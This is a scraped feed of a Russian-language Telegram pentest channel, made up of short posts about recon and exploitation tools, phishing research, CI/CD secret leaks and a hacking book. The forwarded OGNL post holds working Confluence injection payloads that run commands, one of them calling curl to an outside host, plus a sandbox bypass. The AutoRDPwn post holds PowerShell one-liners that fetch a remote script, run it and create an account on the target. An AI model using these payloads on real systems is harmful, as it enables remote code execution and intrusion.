Похек
16.4K subscribers
2.08K photos
110 videos
243 files
3.06K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
32🎉2
dnsgen

Инструмент dnsgen создает комбинации доменных имен с использованием предоставленных входных данных и списка слов. Он подобен инструменту altdns, но не выполняет резолв DNS. Для этой цели можно использовать dnsx. Инструмент позволяет настраивать извлечение слов и предлагает такие методы, как вставка, замена и манипуляции словами в поддоменах.

Установка:
pip3 install dnsgen

git clone https://github.com/ProjectAnte/dnsgen; cd dnsgen; pip3 install -r requirements.txt; python3 setup.py install

Использование:
cat domains.txt | dnsgen - | dnsx -silent

💬 Канал | 💻 Github
Please open Telegram to view this post
VIEW IN TELEGRAM
7
В эту субботу буду на IT-пикнике от Тинькофф. Если кто-то там будет, то увидимся в субботу!
👍9
Тинькофф очень стараются))
Forwarded from БП online
Девочки, вирусняк к IT-пикнику смешной
👍10🎉3
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Вот смотрю ещё один свежий материал по фишингу от TrustedSec. Главная идея: с помощью HTML инъекции отправить сообщение с доверенного домена.

https://www.trustedsec.com/blog/crafting-emails-with-html-injection

Т.е. это двойной фишинг получается?! Сложно пока, но интересно...

#pentest #redteam #fishing
ИТ-Пикник 🎉
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤‍🔥2🌚1
👾10🆒2
@c0rv4x спасибо за доклад и фотку 👾
❤‍🔥22
Forwarded from Monkey Hacker
OGNL and sandboxes

Существует такая вещь в Java, как Object Graph Notation Language (OGNL) еще один Expression language. Чаще всего данный фреймворк можно заметить в продуктах Apache и Attlasian

OGNL вызывает методы несколько иначе, чем Java, поскольку OGNL интерпретируется и должен выбрать нужный метод во время выполнения программы, не имея никакой дополнительной информации о типе, кроме собственно предоставленных аргументов. OGNL всегда выбирает наиболее специфичный метод, типы которого соответствуют заданным аргументам

Спустя время, выяснилось, что через OGNL можно также сделать Command Injection. Метод эксплуатации чем-то напоминает SSTI 😻

Разберу пару вулн в Confluence. Проблемы появлялись из-за isSafeExpression

При рендеринге странице, есть спрятанный параметр queryString 😑

Именно он дает нам возможность, поиграться с Java

queryString=aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022java.lang.Runtime\u0022).getMethod(\u0022getRuntime\u0022,null).invoke(null,null).exec(\u0022curl your-domain.com\u0022)}%2b\u0027

Потом нашли проблему в URI. Просто кидай пейлоад сразу в корень (не забудь энкодить)👍

${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Qualys-Response",#a))}

Увы и ах, но спустя время и это тоже пофиксили. Однако, MCKSysAr нашел байпасс.

Самое банальное - это использовать Class, вместо class. Или использовать конкатенацию строк.

Дальше, один из экспертов решил пойти глубже и начал смотреть Abstract Syntax Tree (AST). Как оказалось, AST давал много векторов, для обхода ограничений

Самое вкусное было найдено в BeanMap, который позволял сделать, уже полноценный байпасс

(#@org.apache.commons.beanutils.BeanMap@\\u007b\\u007d).(setBean(''),get('cla'+'ss').forName('javax'+'.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('7*7'))

Всем удачи 😇
Please open Telegram to view this post
VIEW IN TELEGRAM
👾71
Книга Хакерство. Физические атаки с использованием хакерских устройств
Издание: 2023
Язык: русский

Сейчас приехала книга "Хакерство. Физические атаки с использованием хакерских устройств" авторства @s0i37. Он написал целую книгу по физическому пентесту с помощью технических средств, так что её можно считать выжимкой из все его опыта опыта! Кстати книга цветная, так что +10 к читабельности.

В книге описано множество атак, которые могут быть совершены с использованием популярных беспроводных технологий и устройств, собранных самостоятельно из общедоступных недорогих деталей, а также показаны способы защиты от них Одни атаки потребуют физического присутствия, другие могут быть проведены на расстоянии. Многие из них потребуют времени, а некоторые позволяют взломать компьютер за секунду.

Не откладывайте покупку на потом! Тем более цена более чем адекватная, я бы даже сказал не существенная.

P.S. предвижу холивары на тему, "где электронная версия?" В ближайшее время её ждать не стоит, т.к. это требование издательства, а не автора.

#book

💬 Канал | 💬 Канал автора книги
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍124👾1
Forwarded from KazDevOps
Секреты регулярно просачиваются в конвейеры CI/CD, так как рабочие процессы требуют от разработчиков учетных данных для сторонних ресурсов, с которыми взаимодействует их конвейер.

Рассказываем в новой статье, что же делать, чтобы этого не случилось – ротация секретов, управление их привилегиями, анализ логов на наличие чувствительной информации и не только.

#devops #cicd #secretsleak #secrets

@DevOpsKaz
👍10🆒2
Security Certification Roadmap

Сайт с рейтингом сертификаций по различным направлением. Сайт постоянно обновляется и последняя редакций интерактивной таблицы датируется июнем 2023 года.

Данный сайт можно использовать при поиске и сравнения сертификаций для сдачи.

#cert #rating

💬 Канал | ➡️Сайт
Please open Telegram to view this post
VIEW IN TELEGRAM
6
Forwarded from AKTIV.CONSULTING
🗣Компания Qualys представила рейтинг из 20 самых эксплуатируемых уязвимостей, которые используются для совершения атак и распространения вредоносного или вымогательского ПО. Что интересно, 15 из представленных в рейтинге уязвимостей затрагивают продукты Microsoft.

❗️Так, например, первое место занимает уязвимость CVE-2017-11882: повреждение памяти в Microsoft Office, позволяющее выполнить код при открытии специально оформленного документа. Уязвимость использовалась для компрометации систем в 467 вредоносных ПО, атаках 53 злоумышленников и 14 вымогательских программах.

Ознакомиться с рейтингом уязвимостей

💬tg_AC
Please open Telegram to view this post
VIEW IN TELEGRAM
6👍2🆒2
Quick-tricks

Сканер уязвимостей Bitrix на основе руководства Атаки на Bitrix

Установка:
go install github.com/indigo-sadland/quick-tricks@latest

Функционал:
quick-tricks [command]

help
Справка о любой команде
quick Запуск всех быстрых модулей ('recon', 'lfi', 'redirect', 'spoofing' и 'xss')
lfi Модуль проверяет наличие конечных точек, уязвимых к Local File Inclusion.
rce Модуль пытается эксплуатировать уязвимые компоненты целевого Битрикса.
recon Модуль позволяет найти конечные точки страницы входа в систему, раскрыть локальный путь и лицензионный ключ.
redirect Модуль проверяет конечные точки, уязвимые к Open Redirect.
spoofing Модуль проверяет цель на возможность атаки Content Spoofing.
ssrf Модуль позволяет проверить, уязвима ли цель к SSRF.
xss Модуль проверяет конечные точки цели, которые потенциально могут быть уязвимы для XSS. (постоянно фолзы, не советую использовать)

Для получения дополнительной информации о команде используйте команду quick-tricks [command] --help

#bitrix

💬 Канал | 💻 Github
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥11👍4
Как думаете, что будет?)
🔥14
🔴 AutoRDPwn

Это powershell фреймворк для постэксплуатации, предназначенный в первую очередь для автоматизации Shadow-RDP атаки на компьютеры под управлением Microsoft Windows. Данная уязвимость позволяет удаленному злоумышленнику просматривать сессию своей жертвы без ее ведома и даже управлять удаленно.
Благодаря дополнительным модулям можно получить удаленный shell через Netcat, сдампить хэши с помощью Mimikatz, загрузить удаленный кейлоггер и многое другое. И все это с помощью интуитивно понятного меню.
Эта тулза может использоваться локально, удаленно или для pivoting'а между серверами.

На системе должен быть PowerShell 4.0+

⬇️Использование:
-admin / -noadmin
— явное указание прав доступа для запуска атак;
-nogui
— отключает загрузку меню и некоторых цветов, дабы гарантировать общую работоспособность;
-lang
— выбор языка интерфейса. [English, Spanish, French, German, Italian, Russian or Portuguese];
-option
— выбор типа атаки;
-shadow
— выбираем следить или контролировать удаленную машину;
-createuser
— не обязательный параметр, который позволяет создаст пользователя AutoRDPwn:AutoRDPwn на атакуемой машине;
-noclean
- не обязательный параметр, который отключит автоматический откат параметров после окончания атаки

Дефолтый запуск:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

Запуск сразу с параметрами:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

📌Как итог, данный скрипт отлично подойдёт для этапа распространения по сети заказчика во время пентеста. Также он является неплохой автоматизацией, потому что ShadowRDP атаку через реестр WIndows проводить руками немного геморно. + автор скрипта добавил некоторые атаки на AD.

#windows #pentest #powershell

💬 Канал | 💻 Github
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍83